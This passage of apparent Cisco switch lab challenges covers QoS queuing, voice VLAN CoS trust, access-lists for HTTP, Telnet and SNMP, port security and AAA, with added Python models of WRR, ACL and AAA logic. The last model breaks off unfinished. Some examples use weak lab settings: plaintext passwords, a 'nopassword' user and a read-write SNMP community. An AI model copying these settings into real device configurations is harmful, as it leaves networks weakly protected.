Limit traffic which fits access-list 111 to 2Mbps

Ref:
http://www.netcraftsmen.net/welcher/papers/newqos121.html

Cisco Switch Challenge 95


Outline
This challenge involves the configuration of Weighted RR (WRR).
> CCNP ONT Area: Unit 4: Congestion Management and Queuing
Objectives


The objectives of this challenge are to:

Enable QoS globally (mls qos).


Define Layer 3 operation (no switchport).
Define WRR.

Example
(config)# mls qos
(config)# int fa0/1
(config-if)# no switchport
(config-if)# mls ?
qos  qos command keyword
(config-if)# mls qos ?
cos            Configure interface COS parameters
dscp-mutation  Apply DSCP-DSCP map to DSCP trusted port
monitor        Collect QoS statistics
trust          Configure trust state of interface
(config-if)# mls qos trust ?
cos            Classify by packet COS
device         trusted device class
dscp           Classify by packet DSCP
ip-precedence  Classify by packet IP precedence
<cr>
(config-if)# mls qos trust cos
(config-if)# priority-queue ?
out  egress priority queue
(config-if)# priority-queue out
(config-if)# wrr-queue ?
bandwidth    Configure WRR bandwidth
cos-map      Configure cos-map for a queue id
min-reserve  Configure min-reserve level
(config-if)# wrr-queue bandwidth ?
<1-65536> enter bandwidth weight for qid 1
(config-if)# wrr-queue bandwidth 3 ?
<1-65536> enter bandwidth weight for qid 2
(config-if)# wrr-queue bandwidth 3 8 ?
<1-65536> enter bandwidth weight for qid 3
(config-if)# wrr-queue bandwidth 3 8 10 ?
<1-65536> enter bandwidth weight for qid 4
(config-if)# wrr-queue bandwidth 3 8 10 12

In this case the bandwidth is:


Queue 1: 3/(3+8+10+12) = 9.1%
Queue 2: 8/(3+8+10+12) = 24.2%
Queue 3: 10/(3+8+10+12) = 30.3%
Queue 4: 12/(3+8+10+12) = 36.4%


(config-if)# wrr-queue cos-map ?
<1-4> enter cos-map queue id
(config-if)# wrr-queue cos-map 1 ?
<0-7> 8 cos values separated by spaces
(config-if)# wrr-queue cos-map 1 0 1 2 4
(config-if)# wrr-queue cos-map 3 4 5

Queue 1 has CoS of 0, 1, 2 and 4 allocated to it


Queue 3 has CoS of 4 and 5 allocated to it.
(config-if)# wrr-queue random-detect 1 max-threshold 50 100
(config-if)# wrr-queue random-detect 3 max-threshold 80 100

Queue 1 has a min threshold of 50% and a max of 100%


Queue 3 has a min threshold of 80% and a max of 100%
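As an added example (not NetworkSims or Cisco code), the Python below parses the wrr-queue lines from this challenge, computes each queue's WRR share, and flags that the second cos-map command moves CoS 4 from queue 1 to queue 3, since a CoS value can sit in only one queue. The four-queue count and the sample command list are assumptions taken from the transcript above.

```python
"""Model the egress WRR configuration built up in Challenge 95 above."""
import re
from fractions import Fraction

# Constructed sample: the interface commands entered in the challenge above.
WRR_COMMANDS = [
    "wrr-queue bandwidth 3 8 10 12",
    "wrr-queue cos-map 1 0 1 2 4",
    "wrr-queue cos-map 3 4 5",
]

NUM_QUEUES = 4      # assumption: the platform in the challenge has four egress queues
COS_VALUES = range(8)


def wrr_shares(weights):
    """Return each queue's share of the scheduler as a Fraction.

    Queue i gets weight_i / sum(weights); queue ids are 1-based, as in the
    'enter bandwidth weight for qid N' prompts.
    """
    if len(weights) != NUM_QUEUES:
        raise ValueError(f"expected {NUM_QUEUES} weights, got {len(weights)}")
    if any(w < 1 or w > 65536 for w in weights):
        raise ValueError("weights must be in <1-65536>")
    total = sum(weights)
    return {qid: Fraction(w, total) for qid, w in enumerate(weights, start=1)}


def apply_commands(commands):
    """Parse 'wrr-queue bandwidth ...' and 'wrr-queue cos-map ...' lines.

    Returns (weights, cos_to_queue, reassigned). reassigned lists CoS values
    that a later cos-map command moved away from an earlier queue: a CoS
    value belongs to exactly one queue, so the last mapping wins.
    """
    weights = None
    cos_to_queue = {}
    reassigned = []
    bw_pat = re.compile(r"wrr-queue bandwidth((?: \d+){%d})" % NUM_QUEUES)
    map_pat = re.compile(r"wrr-queue cos-map (\d+)((?: [0-7]){1,8})")
    for line in commands:
        m = bw_pat.fullmatch(line.strip())
        if m:
            weights = [int(x) for x in m.group(1).split()]
            continue
        m = map_pat.fullmatch(line.strip())
        if m:
            qid = int(m.group(1))
            if not 1 <= qid <= NUM_QUEUES:
                raise ValueError(f"queue id {qid} outside <1-{NUM_QUEUES}>")
            for cos in (int(x) for x in m.group(2).split()):
                prev = cos_to_queue.get(cos)
                if prev is not None and prev != qid:
                    reassigned.append((cos, prev, qid))
                cos_to_queue[cos] = qid
            continue
        raise ValueError(f"unrecognised command: {line!r}")
    return weights, cos_to_queue, reassigned


def unmapped_cos(cos_to_queue):
    """CoS values the commands never placed; they keep the platform default."""
    return [c for c in COS_VALUES if c not in cos_to_queue]


if __name__ == "__main__":
    weights, cmap, moved = apply_commands(WRR_COMMANDS)
    for qid, share in wrr_shares(weights).items():
        print(f"Queue {qid}: {weights[qid - 1]}/{sum(weights)} = {float(share):.1%}")
    for cos, old, new in moved:
        print(f"CoS {cos} was on queue {old}; a later command moved it to queue {new}")
    print("unmapped CoS values:", unmapped_cos(cmap))
```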

Cisco Switch Challenge 126


Outline
This challenge involves the configuration of a priority queue (PQ) which has four queues:
high, medium, normal and low.
Objectives
The objectives of this challenge are to:

Define queue limits


Define protocols to go into queues.
Apply PQ.

Overview
(config)# priority-list 1 q 20 40 60 80
(config)# priority-list 1 protocol http high
(config)# priority-list 1 protocol ipx low
(config)# int fa0/1
(config-if)# priority-group 1

Example
(config)# priority-list ?
<1-16> Priority list number
(config)# priority-list 1 ?
default      Set priority queue for unspecified datagrams
interface    Establish priorities for packets from a named interface
protocol     priority queueing by protocol
queue-limit  Set queue limits for priority queues
(config)# priority-list 1 q ?
<0-32767> High limit
(config)# priority-list 1 q 20 ?
<0-32767> Medium limit
(config)# priority-list 1 q 20 40 ?
<0-32767> Normal limit
(config)# priority-list 1 q 20 40 60 ?
<0-32767> Lower limit
(config)# priority-list 1 q 20 40 60 80 ?
<cr>
(config)# priority-list 1 q 20 40 60 80
(config)# prio 1 p ?
aarp              AppleTalk ARP
appletalk         AppleTalk
arp               IP ARP
bridge            Bridging
bstun             Block Serial Tunnel
cdp               Cisco Discovery Protocol
clns              ISO CLNS
clns_es           ISO CLNS End System
clns_is           ISO CLNS Intermediate System
cmns              ISO CMNS
compressedtcp     Compressed TCP (VJ)
decnet            DECnet
decnet_node       DECnet Node
decnet_router-l1  DECnet Router L1
decnet_router-l2  DECnet Router L2
dlsw              Data Link Switching (Direct encapsulation only)
http              HTTP
ip                IP
ipv6              IPV6
ipx               Novell IPX
llc2              llc2
pad               PAD links
pppoe             PPP over Ethernet
qllc              qllc protocol
rsrb              Remote Source-Route Bridging
snapshot          Snapshot routing support
stun              Serial Tunnel
(config)# priority-list 1 protocol http ?
high
medium
normal
low
(config)# priority-list 1 protocol http high
(config)# priority-list 1 protocol ipx low
(config)# int fa0/1
(config-if)# priority-group 1


Cisco Switch Challenge 127


Outline
This challenge involves the configuration of a custom queue (CQ). Up to 16 queues can be
configured.
Objectives
The objectives of this challenge are to:

Define queues.
Apply CQ.

Overview
(config)# queue-list 1 protocol ip 1
(config)# queue-list 1 protocol ip 2 tcp www
(config)# queue-list 1 protocol ip 3 udp rip
(config)# queue-list 1 queue 1 limit 40
(config)# queue-list 1 queue 2 limit 40
(config)# queue-list 1 queue 3 limit 80
(config)# int vlan1
(config-if)# custom-queue-list 1

Example
(config)# queue-list ?
<1-16> Queue list number
(config)# queue-list 1 ?
default        Set custom queue for unspecified datagrams
interface      Establish priorities for packets from a named interface
lowest-custom  Set lowest number of queue to be treated as custom
protocol       priority queueing by protocol
queue          Configure parameters for a particular queue
stun           Establish priorities for stun packets
Switch(config)# queue-list 1 protocol ?
arp            IP ARP
bridge         Bridging
cdp            Cisco Discovery Protocol
compressedtcp  Compressed TCP
ip             IP
Switch(config)# queue-list 1 protocol ip ?
<0-16> queue number
Switch(config)# queue-list 1 protocol ip 1 ?
fragments  Prioritize fragmented IP packets
gt         Classify packets greater than a specified size
list       To specify an access list
lt         Classify packets less than a specified size
tcp        Prioritize TCP packets 'to' or 'from' the specified port
udp        Prioritize UDP packets 'to' or 'from' the specified port
(config)# queue-list 1 protocol ip 1
(config)# queue-list 1 protocol ip 1 tcp ?
<0-65535>    Port number
bgp          Border Gateway Protocol (179)
chargen      Character generator (19)
cmd          Remote commands (rcmd, 514)
daytime      Daytime (13)
discard      Discard (9)
domain       Domain Name Service (53)
echo         Echo (7)
exec         Exec (rsh, 512)
finger       Finger (79)
ftp          File Transfer Protocol (21)
ftp-data     FTP data connections (used infrequently, 20)
gopher       Gopher (70)
hostname     NIC hostname server (101)
ident        Ident Protocol (113)
irc          Internet Relay Chat (194)
klogin       Kerberos login (543)
kshell       Kerberos shell (544)
login        Login (rlogin, 513)
lpd          Printer service (515)
nntp         Network News Transport Protocol (119)
pim-auto-rp  PIM Auto-RP (496)
pop2         Post Office Protocol v2 (109)
pop3         Post Office Protocol v3 (110)
smtp         Simple Mail Transport Protocol (25)
sunrpc       Sun Remote Procedure Call (111)
syslog       Syslog (514)
tacacs       TAC Access Control System (49)
talk         Talk (517)
telnet       Telnet (23)
time         Time (37)
uucp         Unix-to-Unix Copy Program (540)
whois        Nicname (43)
www          World Wide Web (HTTP, 80)
(config)# queue-list 1 protocol ip 2 tcp www
(config)# queue-list 1 protocol ip 1 u ?
<0-65535>    Port number
biff         Biff (mail notification, comsat, 512)
bootpc       Bootstrap Protocol (BOOTP) client (68)
bootps       Bootstrap Protocol (BOOTP) server (67)
discard      Discard (9)
dnsix        DNSIX security protocol auditing (195)
domain       Domain Name Service (DNS, 53)
echo         Echo (7)
isakmp       Internet Security Association and Key Management Protocol (500)
mobile-ip    Mobile IP registration (434)
nameserver   IEN116 name service (obsolete, 42)
netbios-dgm  NetBios datagram service (138)
netbios-ns   NetBios name service (137)
netbios-ss   NetBios session service (139)
ntp          Network Time Protocol (123)
pim-auto-rp  PIM Auto-RP (496)
rip          Routing Information Protocol (router, in.routed, 520)
snmp         Simple Network Management Protocol (161)
snmptrap     SNMP Traps (162)
sunrpc       Sun Remote Procedure Call (111)
syslog       System Logger (514)
tacacs       TAC Access Control System (49)
talk         Talk (517)
tftp         Trivial File Transfer Protocol (69)
time         Time (37)
who          Who service (rwho, 513)
xdmcp        X Display Manager Control Protocol (177)
(config)# que 1 queue ?
<0-16> queue number
(config)# que 1 q 1 ?
byte-count  Specify size in bytes of a particular queue
limit       Set queue entry limit of a particular queue
(config)# que 1 q 1 limit ?
<0-32767> number of queue entries
(config)# que 1 q 1 l 40 ?
byte-count  Specify size in bytes of a particular queue
<cr>
(config)# que 1 q 1 l 40
(config)# int vlan 1
(config-if)# custom-queue-list ?
<1-16> Custom queue list number
(config-if)# custom-queue-list 1

Cisco Switch Challenge 96


Outline
This challenge involves configuring Auto QoS on a switch.
Objectives
The objectives of this challenge are to:

Define Auto QoS

Example


> en
# config t
(config)# cdp run
(config)# int vlan 10
(config-vlan)# exit
(config)# int vlan 20
(config-vlan)# exit
(config)# int fa0/1
(config-if)# cdp enable
(config-if)# switchport ?
access         Set access mode characteristics of the interface
block          Disable forwarding of unknown uni/multi cast addresses
broadcast      Set broadcast suppression level on this interface
encapsulation  Set trunking encapsulation when interface is in trunking mode
host           Set port host
mode           Set trunking mode of the interface
multicast      Set multicast suppression level on this interface
native         Set trunking native characteristics when interface is in trunking mode
nonegotiate    Device will not engage in negotiation protocol on this interface
port-security  Security related command
priority       Set appliance 802.1p priority
protected      Configure an interface to be a protected port
pruning        Set pruning VLAN characteristics when interface is in trunking mode
trunk          Set trunking characteristics of the interface
unicast        Set unicast suppression level on this interface
voice          Voice appliance attributes
<cr>
(config-if)# switchport access vlan 10
(config-if)# switchport voice ?
vlan  Vlan for voice traffic
(config-if)# switchport voice vlan ?
<1-4094>  Vlan for voice traffic
dot1p     Priority tagged on PVID
none      Don't tell telephone about voice vlan
untagged  Untagged on PVID
(config-if)# switchport voice vlan 20
(config-if)# au ?
qos  Configure AutoQoS
(config-if)# auto qos ?
voip  Configure AutoQoS for VoIP
(config-if)# auto qos voip ?
cisco-phone  Trust the QoS marking of Cisco IP Phone
trust        Trust the COS marking
(config-if)# auto qos voip cisco-phone
(config-if)# exit


Note:
For Auto QoS VoIP, CDP needs to be enabled.

Cisco Switch Challenge 97


Area: Switches Voice VLAN
Outline
This challenge involves configuring MLS for Voice in 802.1P priority-tagged frames.
Objectives
The objectives of this challenge are to:

Define MLS.
Apply to FA0/1.
Define 802.1P frames.

The commands used are:


> enable
# config t
(config)# mls qos
(config)# int fa0/1
(config-if)# mls qos trust cos
(config-if)# switchport voice vlan dot1p

Example
> enable
# config t
(config)# mls ?
aclmerge  Modify behavior of ACL merge
qos       QoS parameters
(config)# mls qos
(config-if)# mls ?
qos  qos command keyword
(config-if)# mls qos ?
cos            Configure interface COS parameters
dscp-mutation  Apply DSCP-DSCP map to DSCP trusted port
monitor        Collect QoS statistics
trust          Configure trust state of interface
(config-if)# mls qos trust ?
cos            Classify by packet COS
device         trusted device class
dscp           Classify by packet DSCP
ip-precedence  Classify by packet IP precedence
<cr>
(config-if)# mls qos trust cos
(config-if)# switchport voice ?
vlan  Vlan for voice traffic
(config-if)# switchport voice vlan ?
<1-4094>  Vlan for voice traffic
dot1p     Priority tagged on PVID
none      Don't tell telephone about voice vlan
untagged  Untagged on PVID
(config-if)# switchport voice vlan dot1p

Cisco Switch Challenge 98


Area: Switches Voice VLAN
Outline
This challenge involves the configuring of MLS for Voice where the CoS value that is
received is overwritten with a new value.
Objectives
The objectives of this challenge are to:

Define MLS.
Define the routing for 802.1Q frames.
Apply to FA0/1.
Define the CoS value (0 is the lowest priority, 7 the highest).

The commands used are:


# config t
(config)# int vlan 3
(config-vlan)# exit
(config)# mls qos
(config)# int fa0/1
(config-if)# mls qos trust cos
(config-if)# switchport voice vlan 3
(config-if)# switchport priority extended cos 3

Example
> enable
# config t
(config)# mls ?
aclmerge  Modify behavior of ACL merge
qos       QoS parameters
(config)# mls qos
(config)# int fa0/1
(config-if)# mls qos trust cos
(config-if)# switchport priority extended ?
cos    Override 802.1p priority of devices on appliance
trust  Trust 802.1p priorities of devices on appliance
(config-if)# switchport priority extended cos ?
<0-7> Priority for devices on appliance
(config-if)# switchport priority extended cos 3 ?
<cr>
(config-if)# switchport priority extended cos 3
(config-if)# priority-queue ?
out  egress priority queue
(config-if)# priority-queue out ?
<cr>
(config-if)# priority-queue out

Cisco Switch Challenge 99


Area: Switches Voice VLAN
Outline
This challenge involves configuring the switch so that the IP phone trusts the CoS value.
Objectives
The objectives of this challenge are to:

Define MLS.
Define the routing for 802.1Q frames.
Apply to FA0/1.

The commands used are:


# config t
(config)# int vlan 3
(config-vlan)# exit
(config)# mls qos
(config)# int fa0/1
(config-if)# mls qos trust cos
(config-if)# switchport voice vlan 3
(config-if)# switchport priority extended trust

Example
> enable
# config t
(config)# mls ?
aclmerge  Modify behavior of ACL merge
qos       QoS parameters
(config)# mls qos
(config)# int fa0/1
(config-if)# mls qos trust cos
(config-if)# switchport voice vlan 3
(config-if)# switchport priority extended ?
cos    Override 802.1p priority of devices on appliance
trust  Trust 802.1p priorities of devices on appliance
(config-if)# switchport priority extended trust

Cisco Switch Test 8 (Challenge 100)


Unit 8: QoS
The most up-to-date version of this test is at:
http://networksims.com/sw08.html

Cisco Switch Challenge 101


Outline
This challenge involves the configuration of an access-class.

Objectives
The objectives of this challenge are to:

Setup an access-list for a single access to the Web server.


Apply the access-list to the Web server.

Example
> en
# config t
(config)# access-list 9 permit 193.91.79.4
(config)# access-list 9 deny any
(config)# ip http access-class ?
<1-99> Access list number
(config)# ip http access-class 9
(config)# ip http server

Cisco Switch Challenge 102



Outline
This challenge involves the configuration to deny access for a single host to the Web server.
Objectives
The objectives of this challenge are to:

Define an access-list which denies a single host.


Apply the access-list onto the Web server.

Example
> en
# config t
(config)# access-list 11 deny 192.1.179.24
(config)# access-list 11 permit any
(config)# ip http access-class ?
<1-99> Access list number
(config)# ip http access-class 11
(config)# ip http server

Cisco Switch Challenge 103


Outline
This challenge involves the configuration which permits a single host access to a Telnet
server.

Objectives
The objectives of this challenge are to:

Define an access-list which permits a single host access to the Telnet server.
Apply the access-list onto the Telnet server.

Example
# config t
(config)# access-list 8 permit 205.191.68.8
(config)# access-list 8 deny any
(config)# line vty 0 15
(config-line)# login
(config-line)# access-class ?
<1-199>      IP access list
<1300-2699>  IP expanded access list
WORD         Access-list name
(config-line)# access-class 8 ?
in   Filter incoming connections
out  Filter outgoing connections
(config-line)# access-class 8 in

Cisco Switch Challenge 104


Outline
This challenge involves the configuration which denies a single host access a Telnet server.
Objectives
The objectives of this challenge are to:

Define an access-list which denies a single host access to a Telnet server.


Apply the access-list to the Telnet server.

Example
# config t
(config)# access-list 8 deny 205.191.68.8
(config)# access-list 8 permit any
(config)# line vty 0 15
(config-line)# login
(config-line)# access-class ?
<1-199>      IP access list
<1300-2699>  IP expanded access list
WORD         Access-list name
(config-line)# access-class 8 ?
in   Filter incoming connections
out  Filter outgoing connections
(config-line)# access-class 8 in

Cisco Switch Challenge 105


Outline
This challenge involves the configuration of a restriction on a user.
Objectives
The objectives of this challenge are to:

Define a single host access.


Link the access to a user.


Example
> en
# config t
(config)# access-list 6 permit 12.84.44.10
(config)# access-list 6 deny any
(config)# username david ?
access-class         Restrict access by access-class
autocommand          Automatically issue a command after the user logs in
callback-dialstring  Callback dialstring
callback-line        Associate a specific line with this callback
callback-rotary      Associate a rotary group with this callback
dnis                 Do not require password when obtained via DNIS
nocallback-verify    Do not require authentication after callback
noescape             Prevent the user from using an escape character
nohangup             Do not disconnect after an automatic command
nopassword           No password is required for the user to log in
password             Specify the password for the user
privilege            Set user privilege level
secret               Specify the secret for the user
user-maxlinks        Limit the user's number of inbound links
(config)# username david access-class ?
<1-199>      Access-class number
<1300-2699>  Expanded Access-class number
(config)# username david access-class 6
(config)# username anne ?
access-class         Restrict access by access-class
autocommand          Automatically issue a command after the user logs in
callback-dialstring  Callback dialstring
callback-line        Associate a specific line with this callback
callback-rotary      Associate a rotary group with this callback
dnis                 Do not require password when obtained via DNIS
nocallback-verify    Do not require authentication after callback
noescape             Prevent the user from using an escape character
nohangup             Do not disconnect after an automatic command
nopassword           No password is required for the user to log in
password             Specify the password for the user
privilege            Set user privilege level
secret               Specify the secret for the user
user-maxlinks        Limit the user's number of inbound links
(config)# username anne nopassword

Cisco Switch Challenge 106


Outline
This challenge involves the configuration of switchport restrictions.
Objectives
The objectives of this challenge are to:

Define port-security.


Example
> en
# config t
(config)# int fa0/1
(config-if)# switchport ?
access         Set access mode characteristics of the interface
block          Disable forwarding of unknown uni/multi cast addresses
broadcast      Set broadcast suppression level on this interface
encapsulation  Set trunking encapsulation when interface is in trunking mode
host           Set port host
mode           Set trunking mode of the interface
multicast      Set multicast suppression level on this interface
native         Set trunking native characteristics when interface is in trunking mode
nonegotiate    Device will not engage in negotiation protocol on this interface
port-security  Security related command
priority       Set appliance 802.1p priority
protected      Configure an interface to be a protected port
pruning        Set pruning VLAN characteristics when interface is in trunking mode
trunk          Set trunking characteristics of the interface
unicast        Set unicast suppression level on this interface
voice          Voice appliance attributes
<cr>
(config-if)# switchport mode ?
access        Set trunking mode to ACCESS unconditionally
dot1q-tunnel  Set trunking mode to DOT1Q TUNNEL unconditionally
dynamic       Set trunking mode to dynamically negotiate access or trunk mode
trunk         Set trunking mode to TRUNK unconditionally
(config-if)# switchport mode access
(config-if)# switchport port-security violation ?
protect   Security violation protect mode
restrict  Security violation restrict mode
shutdown  Security violation shutdown mode
(config-if)# switchport port-security violation shutdown
(config-if)# switchport port-security ?
aging        Port-security aging commands
mac-address  Secure mac address
maximum      Max secure addresses
violation    Security violation mode
<cr>
(config-if)# switchport port-security mac-address ?
H.H.H   48 bit mac address
sticky  Configure dynamic secure addresses as sticky
(config-if)# switchport port-security mac-address 00e0.4e3d.a1bb

Cisco Switch Challenge 107


Outline
This challenge involves the configuration of a single host access to SNMP.
Objectives


The objectives of this challenge are to:

Define an access-list which permits a single host.


Apply the access-list onto SNMP restrictions.

Example
# config t
(config)# access-list 6 permit 111.101.136.8
(config)# access-list 6 deny any
(config)# snmp-server community fries ?
<1-99>       Std IP accesslist allowing access with this community string
<1300-1999>  Expanded IP accesslist allowing access with this community string
ro           Read-only access with this community string
rw           Read-write access with this community string
view         Restrict this community to a named MIB view
<cr>
(config)# snmp-server community fries rw ?
<1-99>       Std IP accesslist allowing access with this community string
<1300-1999>  Expanded IP accesslist allowing access with this community string
<cr>
(config)# snmp-server community fries rw 6
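The access-lists in Challenges 101 to 107 all rely on the same standard-ACL rules: the first matching entry decides, wildcard-mask bits are ignored in the comparison, and a source that matches nothing is denied. The Python below is an added example, not NetworkSims or Cisco code, that evaluates such lists; the decisions() function and its sample config (lists 9 and 8 from Challenges 101 and 104, plus the source half of access-list 108 from Challenge 94) are constructed here.

```python
"""Evaluate the numbered standard access lists used in Challenges 101-107."""
import ipaddress
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Entry:
    action: str          # "permit" or "deny"
    network: int         # host/network address as an integer
    wildcard: int        # wildcard mask as an integer (1 bits = don't care)


def _ip(text):
    return int(ipaddress.IPv4Address(text))


def parse_acl(lines):
    """Parse 'access-list N {permit|deny} SOURCE' lines (standard-ACL syntax).

    SOURCE may be 'any', 'host A.B.C.D', 'A.B.C.D' (a single host) or
    'A.B.C.D W.W.W.W' (address plus wildcard mask). Returns {number: [Entry]}.
    """
    acls = {}
    pat = re.compile(r"access-list (\d+) (permit|deny) (.+)")
    for line in lines:
        m = pat.fullmatch(line.strip())
        if not m:
            raise ValueError(f"not a standard ACL line: {line!r}")
        num, action, rest = int(m.group(1)), m.group(2), m.group(3).split()
        if rest == ["any"]:
            net, wc = 0, 0xFFFFFFFF
        elif rest[0] == "host" and len(rest) == 2:
            net, wc = _ip(rest[1]), 0
        elif len(rest) == 1:
            net, wc = _ip(rest[0]), 0
        elif len(rest) == 2:
            net, wc = _ip(rest[0]), _ip(rest[1])
        else:
            raise ValueError(f"cannot parse source in {line!r}")
        acls.setdefault(num, []).append(Entry(action, net, wc))
    return acls


def matches(entry, addr):
    # Wildcard semantics: bits set in the mask are ignored in the comparison.
    return (addr & ~entry.wildcard) == (entry.network & ~entry.wildcard)


def evaluate(entries, source):
    """First matching entry decides; with no match the ACL denies."""
    addr = _ip(source)
    for entry in entries:
        if matches(entry, addr):
            return entry.action
    return "deny"          # the implicit 'deny any' at the end of every IOS ACL


# Constructed sample: lists 9 and 8 from the challenges above, plus the source
# part of access-list 108 (Challenge 94) to show what its wildcard covers.
SAMPLE_CONFIG = [
    "access-list 9 permit 193.91.79.4",
    "access-list 9 deny any",
    "access-list 8 deny 205.191.68.8",
    "access-list 8 permit any",
    "access-list 108 permit 162.78.102.0 0.0.255.255",
]


def decisions(config=SAMPLE_CONFIG):
    acls = parse_acl(config)
    return {
        "web_from_allowed_host": evaluate(acls[9], "193.91.79.4"),
        "web_from_other_host": evaluate(acls[9], "193.91.79.5"),
        "telnet_from_blocked_host": evaluate(acls[8], "205.191.68.8"),
        "telnet_from_other_host": evaluate(acls[8], "10.0.0.1"),
        # 0.0.255.255 ignores the last two octets, so the entry matches all of
        # 162.78.0.0/16, not only 162.78.102.0/24.
        "acl108_other_third_octet": evaluate(acls[108], "162.78.250.1"),
        "acl108_outside": evaluate(acls[108], "162.79.102.1"),
    }


if __name__ == "__main__":
    for name, verdict in decisions().items():
        print(f"{name}: {verdict}")
```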

Cisco Switch Challenge 108


Outline
This challenge involves the configuration of a local server for AAA.
Objectives
The objectives of this challenge are to:

Define AAA.
Define the local server.

Example
> enable
# config t
(config)# aaa new-model
(config)# aaa authentication ?
arap             Set authentication lists for arap.
banner           Message to use when starting login/authentication.
dot1x            Set authentication lists for IEEE 802.1x.
enable           Set authentication list for enable.
fail-message     Message to use for failed login/authentication.
login            Set authentication lists for logins.
nasi             Set authentication lists for NASI.
password-prompt  Text to use when prompting for a password
ppp              Set authentication lists for ppp.
username-prompt  Text to use when prompting for a username
(config)# aaa authentication login ?
WORD     Named authentication list.
default  The default authentication list.
(config)# aaa authentication login default ?
enable      Use enable password for authentication.
group       Use Server-group
line        Use line password for authentication.
local       Use local username authentication.
local-case  Use case-sensitive local username authentication.
none        NO authentication.

(config)# aaa authentication login default local


(config)# username fred password bert
(config)# username fred1 password bert2

Or
> enable
# config t
(config)# aaa new-model
(config)# aaa authen login default group ?
WORD     Server-group name
radius   Use list of all Radius hosts.
tacacs+  Use list of all Tacacs+ hosts.

(config)# aaa authentication login default group radius


(config)# username fred password bert
(config)# username fred1 password bert2

Cisco Switch Challenge 109


Outline
This challenge involves the configuration of a RADIUS server for AAA.
Objectives
The objectives of this challenge are to:

Define AAA.
Define the radius server.

Example
> enable
# config t
(config)# aaa new-model
(config)# radius-server ?
attribute           Customize selected radius attributes
authorization       Authorization processing information
challenge-noecho    Data echoing to screen is disabled during Access-Challenge
configure-nas       Attempt to upload static routes and IP pools at startup
deadtime            Time to stop using a server that doesn't respond
directed-request    Allow user to specify radius server to use with `@server'
domain-stripping    Strip the domain from the username
host                Specify a RADIUS server
key                 encryption key shared with the radius servers
local               Configure local RADIUS server
optional-passwords  The first RADIUS request can be made without requesting a password
retransmit          Specify the number of retries to active server
timeout             Time to wait for a RADIUS server to reply
unique-ident        Higher order bits of Acct-Session-Id
vsa                 Vendor specific attribute configuration
(config)# radius-server host 39.100.234.1
(config)# radius-server key ?
LINE Text of shared key
(config)# radius-server key krinkle
(config)# aaa ?
accounting      Accounting configurations parameters.
authentication  Authentication configurations parameters.
authorization   Authorization configurations parameters.
configuration   Authorization configuration parameters.
nas             NAS specific configuration
new-model       Enable NEW access control commands and functions.(Disables OLD commands.)
processes       Configure AAA background processes
(config)# aaa authentication ?
arap             Set authentication lists for arap.
banner           Message to use when starting login/authentication.
enable           Set authentication list for enable.
fail-message     Message to use for failed login/authentication.
login            Set authentication lists for logins.
nasi             Set authentication lists for NASI.
password-prompt  Text to use when prompting for a password
ppp              Set authentication lists for ppp.
username-prompt  Text to use when prompting for a username
(config)# aaa authentication login ?
WORD     Named authentication list.
default  The default authentication list.
(config)# aaa authentication login default ?
enable      Use enable password for authentication.
group       Use Server-group
line        Use line password for authentication.
local       Use local username authentication.
local-case  Use case-sensitive local username authentication.
none        NO authentication.
(config)# aaa authentication login default group radius
(config)# aaa authentication ?
arap             Set authentication lists for arap.
banner           Message to use when starting login/authentication.
enable           Set authentication list for enable.
fail-message     Message to use for failed login/authentication.
login            Set authentication lists for logins.
nasi             Set authentication lists for NASI.
password-prompt  Text to use when prompting for a password
ppp              Set authentication lists for ppp.
username-prompt  Text to use when prompting for a username
(config)# aaa authentication ppp ?
WORD     Named authentication list.
default  The default authentication list.
(config)# aaa authentication ppp default radius
(config)# aaa authorization ?
commands         For exec (shell) commands.
config-commands  For configuration mode commands.
exec             For starting an exec (shell).
network          For network services. (PPP, SLIP, ARAP)
reverse-access   For reverse access connections
(config)# aaa authorization network ?
WORD     Named authorization list.
default  The default authorization list.
(config)# aaa authorization network default ?
enable      Use enable password for authentication.
group       Use Server-group
line        Use line password for authentication.
local       Use local username authentication.
local-case  Use case-sensitive local username authentication.
(config)# aaa authorization network default group radius
(config)# aaa authorization exec default group radius

Cisco Switch Challenge 110


Outline
This challenge involves the configuration of a Tacacs+ server for AAA.
Objectives
The objectives of this challenge are to:

Define AAA.
Define the Tacacs+ server.

Example
> enable
# config t
(config)# aaa new-model
(config)# tacacs-server ?
administration      Start tacacs+ deamon handling administrative messages
attempts            Number of login attempts via TACACS
directed-request    Allow user to specify tacacs server to use with `@server'
dns-alias-lookup    Enable IP Domain Name System Alias lookup for TACACS servers
extended            Enable extended TACACS
host                Specify a TACACS server
key                 Set TACACS+ encryption key.
last-resort         Define TACACS action if no server responds
optional-passwords  The first TACACS request can be made without password verification
packet              Modify TACACS+ packet options
retransmit          Search iterations of the TACACS server list
timeout             Time to wait for a TACACS server to reply
(config)# tacacs-server h ?
Hostname or A.B.C.D IP address of TACACS server
<cr>
(config)# tacacs-server host 39.100.234.1
(config)# tacacs-server key ?
LINE Encryption key string
(config)# tacacs-server key krinkle
(config)# aaa authentication login default group tacacs
(config)# aaa authentication ppp default group tacacs
(config)# aaa authorization network default group tacacs
(config)# aaa authorization exec default group tacacs
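The "Or" variant in Challenge 108 and the server-based lists in Challenges 109 and 110 depend on how IOS walks a method list: only an ERROR (no server answered) moves on to the next method, while a FAIL (credentials rejected) ends the attempt. The Python below is an added simulation, not NetworkSims or Cisco code; the RADIUS user database and the reachability flag are constructed, and treating an unknown local user as FAIL is a simplification.

```python
"""Simulate how IOS walks an AAA login method list (Challenges 108-110)."""

# Each method returns PASS, FAIL (credentials rejected) or ERROR (the method
# could not answer, e.g. no server reachable). IOS moves to the next method
# only on ERROR; a FAIL ends the list and the login is rejected.
PASS, FAIL, ERROR = "PASS", "FAIL", "ERROR"

# Constructed sample data for the simulation.
LOCAL_USERS = {"fred": "bert", "fred1": "bert2"}   # the 'username ... password' lines
RADIUS_USERS = {"anne": "hunter2"}                 # constructed server database


def local_method(user, password, _state):
    # Simplification (assumption): an unknown local user is a FAIL here.
    return PASS if LOCAL_USERS.get(user) == password else FAIL


def group_radius(user, password, state):
    if not state.get("radius_reachable", True):
        return ERROR          # every host in 'group radius' timed out
    return PASS if RADIUS_USERS.get(user) == password else FAIL


def none_method(_user, _password, _state):
    return PASS               # 'none' = NO authentication


METHODS = {"local": local_method, "group radius": group_radius, "none": none_method}


def authenticate(method_list, user, password, state=None):
    """Walk the list like 'aaa authentication login default <m1> <m2> ...'.

    Returns (accepted, trace); trace records each method's verdict in order.
    """
    state = state or {}
    trace = []
    for name in method_list:
        verdict = METHODS[name](user, password, state)
        trace.append((name, verdict))
        if verdict == PASS:
            return True, trace
        if verdict == FAIL:
            return False, trace          # rejection is final, no fallthrough
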